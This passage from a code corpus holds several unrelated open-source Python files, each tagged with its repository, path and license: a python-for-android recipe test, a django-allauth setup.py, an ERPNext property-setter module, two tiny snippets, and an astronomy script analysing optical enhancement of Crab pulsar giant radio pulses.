| shashi792/courtlistener | alert/donate/admin.py | Python | agpl-3.0 | 730 |
import unittest
from unittest import mock
from tests.recipes.recipe_lib_test import BaseTestForMakeRecipe
class TestLibvorbisRecipe(BaseTestForMakeRecipe, unittest.TestCase):
"""
    A unit test for recipe :mod:`~pythonforandroid.recipes.libvorbis`
"""
recipe_name = "libvorbis"
sh_command_calls = ["./configure"]
extra_env_flags = {'CFLAGS': 'libogg/include'}
@mock.patch("pythonforandroid.recipes.libvorbis.sh.cp")
@mock.patch("pythonforandroid.util.chdir")
@mock.patch("pythonforandroid.build.ensure_dir")
@mock.patch("pythonforandroid.archs.glob")
@mock.patch("pythonforandroid.archs.find_executable")
def test_build_arch(
self,
mock_find_executable,
mock_glob,
mock_ensure_dir,
mock_current_directory,
mock_sh_cp,
):
# We overwrite the base test method because we need to mock a little
# more with this recipe (`sh.cp`)
super().test_build_arch()
# make sure that the mocked methods are actually called
mock_sh_cp.assert_called()
| kivy/python-for-android | tests/recipes/test_libvorbis.py | Python | mit | 1,073 |
#!/usr/bin/env python
import os
import sys
from fnmatch import fnmatchcase
from setuptools import setup, find_packages
from distutils.util import convert_path
# Provided as an attribute, so you can append to these instead
# of replicating them:
standard_exclude = ["*.py", "*.pyc", "*~", ".*", "*.bak", "Makefile"]
standard_exclude_directories = [
".*", "CVS", "_darcs", "./build",
"./dist", "EGG-INFO", "*.egg-info",
"./example"
]
# Copied from paste/util/finddata.py
def find_package_data(where=".", package="", exclude=standard_exclude,
exclude_directories=standard_exclude_directories,
only_in_packages=True, show_ignored=False):
"""
Return a dictionary suitable for use in ``package_data``
in a distutils ``setup.py`` file.
The dictionary looks like::
{"package": [files]}
Where ``files`` is a list of all the files in that package that
don't match anything in ``exclude``.
If ``only_in_packages`` is true, then top-level directories that
are not packages won't be included (but directories under packages
will).
Directories matching any pattern in ``exclude_directories`` will
be ignored; by default directories with leading ``.``, ``CVS``,
and ``_darcs`` will be ignored.
If ``show_ignored`` is true, then all the files that aren't
included in package data are shown on stderr (for debugging
purposes).
Note patterns use wildcards, or can be exact paths (including
leading ``./``), and all searching is case-insensitive.
"""
out = {}
stack = [(convert_path(where), "", package, only_in_packages)]
while stack:
where, prefix, package, only_in_packages = stack.pop(0)
for name in os.listdir(where):
fn = os.path.join(where, name)
if os.path.isdir(fn):
bad_name = False
for pattern in exclude_directories:
if (fnmatchcase(name, pattern)
or fn.lower() == pattern.lower()):
bad_name = True
if show_ignored:
print >> sys.stderr, (
"Directory %s ignored by pattern %s"
% (fn, pattern))
break
if bad_name:
continue
if (os.path.isfile(os.path.join(fn, "__init__.py"))
and not prefix):
if not package:
new_package = name
else:
new_package = package + "." + name
stack.append((fn, "", new_package, False))
else:
stack.append((fn, prefix + name + "/", package, only_in_packages))
elif package or not only_in_packages:
# is a file
bad_name = False
for pattern in exclude:
if (fnmatchcase(name, pattern)
or fn.lower() == pattern.lower()):
bad_name = True
if show_ignored:
print >> sys.stderr, (
"File %s ignored by pattern %s"
% (fn, pattern))
break
if bad_name:
continue
out.setdefault(package, []).append(prefix+name)
return out
excluded_directories = standard_exclude_directories
package_data = find_package_data(exclude_directories=excluded_directories)
METADATA = dict(
name='django-allauth',
version='0.8.1',
author='Raymond Penners',
author_email='raymond.penners@intenct.nl',
description='Integrated set of Django applications addressing authentication, registration, account management as well as 3rd party (social) account authentication.',
long_description=open('README.rst').read(),
url='http://github.com/pennersr/django-allauth',
keywords='django auth account social openid twitter facebook oauth registration',
install_requires=['django',
'oauth2',
'python-openid'],
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'Environment :: Web Environment',
'Topic :: Internet',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
],
packages=find_packages(exclude=['example']),
package_data=package_data
)
if __name__ == '__main__':
setup(**METADATA)
| GinnyN/towerofdimensions-django | django-allauth/setup.py | Python | bsd-3-clause | 4,743 |
# Copyright (c) 2012 Web Notes Technologies Pvt Ltd (http://erpnext.com)
#
# MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from __future__ import unicode_literals
import webnotes
class DocType:
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def autoname(self):
self.doc.name = self.doc.doc_type + "-" \
+ (self.doc.field_name and (self.doc.field_name + "-") or "") \
+ self.doc.property
def validate(self):
"""delete other property setters on this, if this is new"""
if self.doc.fields['__islocal']:
webnotes.conn.sql("""delete from `tabProperty Setter` where
doctype_or_field = %(doctype_or_field)s
and doc_type = %(doc_type)s
and ifnull(field_name,'') = ifnull(%(field_name)s, '')
and property = %(property)s""", self.doc.fields)
# clear cache
webnotes.clear_cache(doctype = self.doc.doc_type)
def get_property_list(self, dt):
return webnotes.conn.sql("""select fieldname, label, fieldtype
from tabDocField
where parent=%s
and fieldtype not in ('Section Break', 'Column Break', 'HTML', 'Read Only', 'Table')
and ifnull(fieldname, '') != ''
order by label asc""", dt, as_dict=1)
def get_setup_data(self):
return {
'doctypes': [d[0] for d in webnotes.conn.sql("select name from tabDocType")],
'dt_properties': self.get_property_list('DocType'),
'df_properties': self.get_property_list('DocField')
}
def get_field_ids(self):
return webnotes.conn.sql("select name, fieldtype, label, fieldname from tabDocField where parent=%s", self.doc.doc_type, as_dict = 1)
def get_defaults(self):
if not self.doc.field_name:
return webnotes.conn.sql("select * from `tabDocType` where name=%s", self.doc.doc_type, as_dict = 1)[0]
else:
return webnotes.conn.sql("select * from `tabDocField` where fieldname=%s and parent=%s",
(self.doc.field_name, self.doc.doc_type), as_dict = 1)[0]
def on_update(self):
from core.doctype.doctype.doctype import validate_fields_for_doctype
validate_fields_for_doctype(self.doc.doc_type)
|
gangadhar-kadam/mic-wnframework
|
core/doctype/property_setter/property_setter.py
|
Python
|
mit
| 3,077
|
s = "Soy tu padre"
print s.replace("a","*",len(s))
|
CarlosRA97/explorer-interface
|
metodo_cadenas.py
|
Python
|
gpl-2.0
| 51
|
# import pytest
# @pytest.mark.asyncio
# async def test_async_execute(df):
# count_future = df.count(df.x, delay=True)
# await df.execute_async()
# assert await count_future == len(df)
|
maartenbreddels/vaex
|
tests/async_test.py
|
Python
|
mit
| 200
|
from matplotlib import rcParams, rc
from spuriousRadioProbRangeP1 import probsOfGRP
from util import mpfit
from util.fitFunctions import gaussian
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import scipy.stats
import tables
import scipy.special
def fitGauss(xdata,ydata,yerr,flatLine=False):
nBins=100
amplitude = .5*np.max(ydata)
x_offset = xdata[np.argmax(ydata)]
sigma = (np.max(xdata)-np.min(xdata))/10.
y_offset = 3.
fixed = [False]*4
if flatLine == True:
amplitude = 0
fixed[0:3] = [True]*3
params=[sigma, x_offset, amplitude, y_offset] # First guess at fit params
errs = yerr
errs[np.where(errs == 0.)] = 1.
quiet = True
parinfo = [ {'n':0,'value':params[0],'limits':[.0001, .1], 'limited':[True,True],'fixed':fixed[0],'parname':"Sigma",'error':0},
{'n':1,'value':params[1],'limits':[x_offset-sigma*3, x_offset+sigma*3],'limited':[True,True],'fixed':fixed[1],'parname':"x offset",'error':0},
{'n':2,'value':params[2],'limits':[.2*amplitude, 3.*amplitude],'limited':[True,True],'fixed':fixed[2],'parname':"Amplitude",'error':0},
{'n':3,'value':params[3],'limited':[False,False],'fixed':fixed[3],'parname':"y_offset",'error':0}]
fa = {'x':xdata,'y':ydata,'err':yerr}
m = mpfit.mpfit(gaussian, functkw=fa, parinfo=parinfo, maxiter=1000, quiet=quiet)
if m.status <= 0:
print m.status, m.errmsg
mpp = m.params #The fit params
mpperr = m.perror
for k,p in enumerate(mpp):
parinfo[k]['value'] = p
parinfo[k]['error'] = mpperr[k]
        #print parinfo[k]['parname'],p," +/- ",mpperr[k]
if k==0: sigma = p
if k==1: x_offset = p
if k==2: amplitude = p
if k==3: y_offset = p
fineXdata = np.linspace(np.min(xdata),np.max(xdata),100.)
gaussfit = y_offset + amplitude * np.exp( - (( xdata - x_offset)**2) / ( 2. * (sigma**2)))
fineGaussFit = y_offset + amplitude * np.exp( - (( fineXdata - x_offset)**2) / ( 2. * (sigma**2)))
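    #x_offset/(2.355*sigma) below is the peak position over the FWHM; for a gaussian, FWHM = 2*sqrt(2*ln2)*sigma ~ 2.355*sigma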
resolution = np.abs(x_offset/(2.355*sigma))
return {'gaussfit':gaussfit,'resolution':resolution,'sigma':sigma,'x_offset':x_offset,'amplitude':amplitude,'y_offset':y_offset,'fineXdata':fineXdata,'fineGaussFit':fineGaussFit,'parinfo':parinfo}
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'lines.linewidth': 1.5,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble=r'\usepackage{sfmath}')
rcParams.update(params)
phaseShift = 1.-0.677001953125#found with findOpticalPeak.py
def align_yaxis(ax1, v1, ax2, v2):
"""
adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1
Taken from http://stackoverflow.com/questions/10481990/matplotlib-axis-with-two-scales-shared-origin
"""
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
inv = ax2.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))
miny, maxy = ax2.get_ylim()
ax2.set_ylim(miny+dy, maxy+dy)
def indexToPhase(indices):
radioIndexOffset = 0.5#Guppi offset, found as shift in unrotated,rotated radio profiles
radioArrivalPhases = (indices+radioIndexOffset)/2048.+phaseShift
return radioArrivalPhases
def nSigma(pvalue):
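    #map a central (two-sided) coverage probability onto the equivalent number of gaussian sigmas, e.g. nSigma(0.6827) ~ 1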
return scipy.special.erfinv(pvalue)*np.sqrt(2.)
np.seterr(divide='ignore')
np.set_printoptions(threshold=np.nan)
path = '/Scratch/dataProcessing/crabData2/'
nIdxToCheck = 81
nSigmaRadioCutoff = 3
nBins = 250
bUseFineIndexBins = False
bInterpulses = False
#dataFilePath = path+'indPulseProfiles_{}sigma_{}_{}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#radioIndexBinsFine = np.arange(1369,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
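#sum peak heights over the three phase bins centered on the optical peak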
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over the six points around the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex+3])
avgProfileErrors = np.ma.std(surroundingProfiles,axis=0)/np.sqrt(nIdxOffsets)#std over iIdxOffset /sqrt(N) to get error in avgProfile
#add errors in quadrature
skySigma = np.sqrt(np.sum(avgProfileErrors[minProfileIndex-3:minProfileIndex+3]**2.))
#should check error in sky level at some point
print 'sky level',skyLevel,'+/-',skySigma
overallCoincidentProfile-=skyLevel
surroundingProfiles-=skyLevel
avgProfile-=skyLevel
indProfiles-=skyLevel
avgOverallProfile = avgProfile
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
stdProfile = np.sqrt(stdProfile**2+skySigma**2)
avgStdProfile = stdProfile/np.sqrt(nIdxOffsets-1)
giantPeakHeight = np.sum(overallCoincidentProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
overallEnhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
overallEnhancementError = enhancementError
print 'peak enhancement of avg above',radioStrengthCutoff,':',overallEnhancement,'+/-',enhancementError,'(',enhancementNSigma,' sigma)'
overallPeakHeight = np.array(peakHeight)
allProfiles = np.array(surroundingProfiles.data)
allProfiles[idx0]=overallCoincidentProfile#add back in since it was masked and zeroed earlier
allPeakHeights = np.sum(allProfiles[:,peakBins],axis=1)
peakPercentDifferenceByIdxOffset = (allPeakHeights-peakHeight)/peakHeight
nSigmaByIdxOffset = (allPeakHeights-peakHeight)/peakSigma
#significance figure
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(idxOffsets,np.abs(nSigmaByIdxOffset),'k')
ax.set_ylabel('Standard Deviations of Peak Height from Average Peak')
ax.set_xlabel('Pulse Offset Relative to GRP (number of periods)')
ax.set_ylim((0,4.5))
np.savez('sigP1.npz',idxOffsets=idxOffsets,nSigmaByIdxOffset=nSigmaByIdxOffset)
giantPeakHeights = np.sum(indProfiles[:,idx0,peakBins][finalMask],axis=1)
peakHeights = np.sum(indProfiles[:,:,peakBins][finalMask],axis=2)
#index peakHeights[iGRP,iIdxOffset]
maskedPeakHeights = np.ma.array(peakHeights,mask=giantPulseNumberMask[finalMask])
avgPeakHeights = np.ma.mean(maskedPeakHeights,axis=1)#average over iIdxOffset i.e. average of surrounding pulses for each iGRP
opticalEnhancementGRP = (giantPeakHeights-avgPeakHeights)/avgPeakHeights
opticalEnhancement = (avgPeakHeights-overallPeakHeight)/overallPeakHeight
radioProfile = np.loadtxt(path+'radio/RadioProfile_LyneDM_TZRCorrect_withGUPPIdelay.txt',skiprows=1,usecols=[3])
nRadioPhaseBins = len(radioProfile)
radioProfilePhaseBins = (1.*np.arange(nRadioPhaseBins)+.5)/nRadioPhaseBins
radioProfilePhaseBins+=phaseShift
fig = plt.figure()
ax = fig.add_subplot(111)
ax2 = ax.twinx()
pltHandle2 = ax2.plot(radioProfilePhaseBins,radioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.errorbar(phaseBinCenters,overallCoincidentProfile,yerr=stdProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(phaseBinCenters,avgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0,pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax2.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax.set_ylim((0.055,.081))
ax2.set_ylim((.11,.155))
ax.set_xlim((0.97,1.005))
locator = matplotlib.ticker.MultipleLocator(.01)
ax2.yaxis.set_major_locator(locator)
ax.legend(pltHandles,pltLabels,loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=2)
ax.set_ylabel('Optical Counts per Period per Pixel')
ax.set_xlabel('Phase')
ax2.set_ylabel('Normalized Radio Intensity')
#enhanced profile figure
#fig = plt.figure(figsize=(1.8,2))
ax = fig.add_subplot(2,2,1)
#ax = fig.add_axes([0.,.6,.4,.4])
doublePhaseBins = np.concatenate([phaseBinCenters-1,phaseBinCenters,1+phaseBinCenters])
doubleOverallCoincidentProfile = np.concatenate([overallCoincidentProfile,overallCoincidentProfile,overallCoincidentProfile])
doubleStdProfile = np.concatenate([stdProfile,stdProfile,stdProfile])
doubleAvgProfile = np.concatenate([avgProfile,avgProfile,avgProfile])
doubleRadioProfilePhaseBins = np.concatenate([radioProfilePhaseBins-1,radioProfilePhaseBins,1+radioProfilePhaseBins])
doubleRadioProfile = np.concatenate([radioProfile,radioProfile,radioProfile])
ax2 = ax.twinx()
pltHandle2 = ax2.plot(doubleRadioProfilePhaseBins,doubleRadioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.plot(doublePhaseBins,doubleOverallCoincidentProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(doublePhaseBins,doubleAvgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0[0],pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
#rect = plt.Rectangle((.970,0.055),1.005-.970,.081-0.055,edgecolor='green',fill=True,linewidth=2.)
#ax.add_patch(rect)
ax.yaxis.set_visible(False)
ax2.yaxis.set_visible(False)
ax.set_ylim((-.005,.081))
ax2.set_ylim((-.01,.155))
ax.set_xlim((0.01,1.99))
ax.set_xlabel('Phase')
#ax.xaxis.label.set_size(14)
#ax.tick_params(axis='both', which='major', labelsize=12)
#ax2.tick_params(axis='both', which='major', labelsize=12)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
ax2.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
radioProfile = radioProfile*np.max(overallCoincidentProfile)/np.max(radioProfile)
#Now plot optical enhancement vs radio arrival time
radioPhases = indexToPhase(radioIndices)
radioPhaseBins = indexToPhase(radioIndexBins)
radioPhaseBinCenters = radioPhaseBins[0:-1]+np.diff(radioPhaseBins)/2.
print 'radioIndexBins',radioIndexBins,np.diff(radioIndexBins)
print 'radioPhaseBinEdges',radioPhaseBins,np.diff(radioPhaseBins)
radioBinned = np.digitize(radioPhases,bins=radioPhaseBins)
enhancements = []
enhancementNSigmas = []
enhancementNSigmasOverOverall = []
enhancementErrors = []
globalEnhancements = []
globalEnhancementErrors = []
#non-GRP pulse enhancements
profiles = []
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
strongMask = np.logical_and(strongMask,radioPhaseMask)
for iBin,bin in enumerate(radioPhaseBins[0:-1]):
binMask = np.logical_and(radioBinned==(iBin+1),strongMask)
binProfile = np.mean(indProfiles[binMask,idx0,:],axis=0)
profiles.append(binProfile)
phasesInBin = radioPhases[binMask]
surroundingProfiles = np.ma.mean(indProfilesMasked[binMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
nSurroundingProfiles=np.sum(np.logical_not(surroundingProfiles.mask),axis=0)
errorAvgProfile = np.divide(stdProfile,np.sqrt(nSurroundingProfiles))
giantPeakHeight = np.sum(binProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
enhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
enhancements.append(enhancement)
enhancementNSigmas.append(enhancementNSigma)
enhancementErrors.append(enhancementError)
nSigmaOverOverall=(enhancement-overallEnhancement)/enhancementError
enhancementNSigmasOverOverall.append(nSigmaOverOverall)
#print '{:.3}+/-{:.3}({:.3},{:.3})'.format(enhancement,enhancementError,enhancementNSigma,(enhancement-overallEnhancement)/enhancementError)
print '{}\t{:.5}\t{}\t{:.3}\t{:.3}\t{:.3}'.format(radioIndexBins[iBin],bin,np.sum(binMask),enhancement,enhancementError,nSigmaOverOverall)
globalEnhancement = (giantPeakHeight-overallPeakHeight)/overallPeakHeight
globalEnhancementError = peakSigma/overallPeakHeight
globalEnhancements.append(globalEnhancement)
globalEnhancementErrors.append(globalEnhancementError)
nonGRPEnhancement = (peakHeight-overallPeakHeight)/overallPeakHeight
    nonGRPPeakSigma = np.sqrt(np.sum(errorAvgProfile[peakBins]**2))#sum in quadrature, matching peakSigma above
nonGRPEnhancementNSigma = (peakHeight-overallPeakHeight)/nonGRPPeakSigma
nonGRPEnhancementError = nonGRPPeakSigma/overallPeakHeight
#print 'nonGRP {:.3}+/-{:.3}({:.3})'.format(nonGRPEnhancement,nonGRPEnhancementError,nonGRPEnhancementNSigma)
nextBin = radioPhaseBins[iBin+1]
#ax.plot(phaseBinEdges[0:-1],binProfile-avgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax2.errorbar(phaseBinEdges[0:-1],binProfile,yerr=stdProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax3.errorbar(phaseBinEdges[0:-1],avgProfile,yerr=errorAvgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
enhancements = np.array(enhancements)
enhancementErrors = np.array(enhancementErrors)
percentEnhancements = 100.*enhancements
percentEnhancementErrors = 100.*enhancementErrors
fig = plt.figure(figsize=(8.,6.))
#ax = fig.add_subplot(211)
ax = fig.add_axes([.15,.6,.8,.3])
#ax.step(radioIndexBins[0:-1],noiseDist,'g',label='noise detections')
ax.plot(probPhaseBins,np.append(probPeakDist,probPeakDist[-1]),'k',drawstyle='steps-post',label='GRP+noise detections')
ax.set_ylabel('Number of\nGRPs detected')
ax.xaxis.set_visible(False)
ax.xaxis.set_ticks([])
#ax.step(radioIndexBins[0:-1],peakDist,'k',label='GRP+noise detections')
#fig = plt.figure()
#ax = fig.add_subplot(212)
ax2 = fig.add_axes([.15,.1,.8,.5])
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax2.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax2.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
opticalPeakPhase = 0.993998046875
ax2.axhline(0.,linewidth=1.,c='k')
ax2.axvline(opticalPeakPhase,c='gray',linestyle='--')
ax2.set_xlabel('GRP Arrival Phase')
ax2.set_ylabel('Optical Enhancement of\nGRP-Coincident Pulses (%)')
ax2.set_xlim((.392,.411))
ax.set_xlim((.392,.411))
fig.text(.175,.85,'(a)',size=16)
ax2.yaxis.get_major_ticks()[-1].label1.set_visible(False)
fig.text(.175,.55,'(b)',size=16)
#ax2.legend(loc='lower left')
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
radioPhaseBinWidths = np.diff(radioPhaseBins)
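#inverse-variance weighting: mean = sum(x_i/sigma_i^2)/sum(1/sigma_i^2), with uncertainty 1/sqrt(sum(1/sigma_i^2))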
meanPercentEnhancement = np.average(percentEnhancements,weights = 1/percentEnhancementErrors**2)
errorMeanPercentEnhancement = 1./np.sqrt(np.sum(1/percentEnhancementErrors**2))
print 'weighted average enhancement (%):',meanPercentEnhancement,'+/-',errorMeanPercentEnhancement
chi2=np.sum((percentEnhancements-meanPercentEnhancement)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameter: meanEnhancement
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flat line: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
gaussDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors)
fit = gaussDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(gaussDict['fineXdata'],gaussDict['fineGaussFit'])
chi2Fit=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dofFit=len(percentEnhancements)-4 #free parameters:y_offset,x_offset,amplitude,sigma
pvalueFit=1-scipy.stats.chi2.cdf(chi2Fit,dofFit)
print 'gaussian: chi2 dof pvalue significance',chi2Fit,dofFit,pvalueFit,nSigma(1-pvalueFit),'sigmas'
print gaussDict['parinfo']
flatLineDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors,flatLine=True)
fit = flatLineDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(flatLineDict['fineXdata'],flatLineDict['fineGaussFit'])
chi2=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameters:y_offset
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flatLine: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
print flatLineDict['parinfo']
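#nested-model comparison: the chi2 difference between the flat line and the gaussian fit is itself chi2-distributed with dofDiff degrees of freedom (Wilks' theorem)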
chi2Diff = chi2-chi2Fit
dofDiff = dof-dofFit
pvalueDiff=1-scipy.stats.chi2.cdf(chi2Diff,dofDiff)
print 'diff: chi2 dof pvalue significance',chi2Diff,dofDiff,pvalueDiff,nSigma(1-pvalueDiff),'sigmas'
plt.show()
|
bmazin/ARCONS-pipeline
|
examples/Pal2012-crab/enhancementPhaseP1.py
|
Python
|
gpl-2.0
| 21,133
|
